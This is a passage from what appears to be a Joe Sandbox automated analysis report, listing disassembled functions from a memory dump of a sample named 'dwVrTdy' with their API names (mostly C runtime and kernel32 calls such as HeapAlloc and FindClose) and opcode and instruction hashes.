                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11E522B0C68552FA84BF15E25637E2361EB14BC4F945431D70D5BAC6DF7ED8A19340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                                                                                                                                          • Instruction ID: c453223c6d8cd47c47ed22c61a5d91372eb56ab03877e7970ee89db35e276e89
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF117221A0C64281EEA0BF1194131BEA264EF95B80F446431EA8CA7FD6DF7CD842A710
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 61eac2af157a3121e9db72a7ab12f62f902abc9e966b57c26774a66953f3b23f
                                                                                                                                                                                                                                                                                          • Instruction ID: 53ad7e4ebcf70bbc147baffbb6f4522cc7605f433147a713080b0188b35ef670
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61eac2af157a3121e9db72a7ab12f62f902abc9e966b57c26774a66953f3b23f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501F732A1C68481EB54BB15E24137DB251E725FC8F148031DB8C27BCADE2CD8D19740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                                                                                                                                          • Instruction ID: 5c7e9db283dbd9616e620a2f0460926bb10bae5dfaf7a41f643482c145d0b2be
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A11B632D0C68241FFE1BF1098133BA62A0EF95B80F545531EA8CA7AD7DF6CD801A740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                                                                                                                                          • Instruction ID: 5460ebf05ed9d9f070b389c27b452d5dca3d6b38ec5c7886792c0c1c08f5fbe4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA01C861A0C78240E994FB629902079A794BF89FE0F086631EEACA3BD6DF3CD4025300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F5E3AC: FindClose.KERNEL32(?,?,?,?,00007FF643F45182), ref: 00007FF643F5E3B6
                                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F48816
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1011579015-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 149518be8d4400a884f8e949f87d89ecf9f0b2ca6220f1b426dc06dfc5b5497f
                                                                                                                                                                                                                                                                                          • Instruction ID: 081f0c5f606520a16d7988d9580b12b8072b992c7796fc10535f710f31f522a4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149518be8d4400a884f8e949f87d89ecf9f0b2ca6220f1b426dc06dfc5b5497f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03018161F2958281EF94FB69D15637C2361EF54F88F945032CB0CA769AEF2ED8819304
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
                                                                                                                                                                                                                                                                                          • Instruction ID: cb89a0b48a1565e543762563989c9a951fa57ccb019b1f54acb8896cd5fcdf78
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6017522B1C78181DA90FB17E5411692360EB98FC8F142533EF4D97796EE38D4528740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                                                                                                                                          • Instruction ID: 0a8ad0f11dcd88b682cdf45adf3b2719f90e997cdf5e63ab36d42208b7972703
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AF0A731B0D74285EBD4FB56D4929BD2160AF68BC0F545034EE5C93BC2EF2DE4695720
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                                                                                                                                          • Instruction ID: b39193da4bd0839cc1c2769559a8a22db549d0569715f034f3f147ec2d2bf8bc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF0A031B0D74245EED4FB96D5926B92194AF18BC0F44A034EA5DD3BC2EE2CF4699710
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
                                                                                                                                                                                                                                                                                          • Instruction ID: 55fa155cfe48ae0d51dd85f224f4e22a3e076bbd07a94151d34938bdb75be5bf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E02231A2C64381EBE87BB5918207C61609F147F0F245331E73C833C6EF2CA865A200
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF643F62B94
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F64CD0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF643F64CD8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F64CD0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF643F64CDD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1208906642-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2659d3a67adecb31f68455b68035f6cd17736bc8922089f6fe0cc6590dcda595
                                                                                                                                                                                                                                                                                          • Instruction ID: a99ae76d6f512da7316cc264a80538da9fe574a84d1c95a4387e3a1a5c5afa65
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2659d3a67adecb31f68455b68035f6cd17736bc8922089f6fe0cc6590dcda595
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0B610D0C243A1FDD53AA125032B922405F22305E6024BCD91DF73C39E4D70577621
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1180542099-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fea51e8d421d60c254057464f59713b649fbd1e7b43c8955b8b34b86c91967dc
                                                                                                                                                                                                                                                                                          • Instruction ID: 6c276ee3173f7dab52e28a787ea4d57915b286a2d9cead07aeb780529e749dbe
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fea51e8d421d60c254057464f59713b649fbd1e7b43c8955b8b34b86c91967dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E0EC50D2DA02C0FAD4773099430B912501F65310FA00935E02DF32E2EF1C6449BA20
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                                                                                                                                          • Instruction ID: ccdf4051dbd2890faa0e36757a30bc1793c655b093e7e420239066992fba6017
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C08C20E0D403D1E8E83B61084B1B401905F34370F506B30D63DE34E2EE1CB06A6A01
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileFindNext
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                                                                                                                                          • Instruction ID: 53904a4e97dd8c778ff2650d92299f75fcd3942f3d8dae3e70744be87b85e5c8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20C09B15F1D503C2E6D43F735C4316511D06F94751F818430C50DE21F0DD5C91E76711
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF643F7715E,?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?), ref: 00007FF643F78819
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3b3465d18bc41eb21600031e2ba75c449a889ef4c951b94005d768bcc6061c80
                                                                                                                                                                                                                                                                                          • Instruction ID: 6ed58fbede18e49e611632d99498dcd33a67c569d24e87171077882d6926c02a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b3465d18bc41eb21600031e2ba75c449a889ef4c951b94005d768bcc6061c80
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F01D54F0D60782FED4BAA69A133F512955F59B80F8C5430DD0EFB6D2EF1CE585A210
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF643F647BB,?,?,?,?,?,?,?,?,?,00007FF643F5EED5), ref: 00007FF643F7A1A6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                                                                                                                                          • Instruction ID: fe74df70d982706888aec4ced459a85321efded33b843dbfa1d2bd63ac31cdae
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F08C58F0C20381FEE87AA29D0337912805F48BB0F0A5630DC2EE77C2DFACE454AA10
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
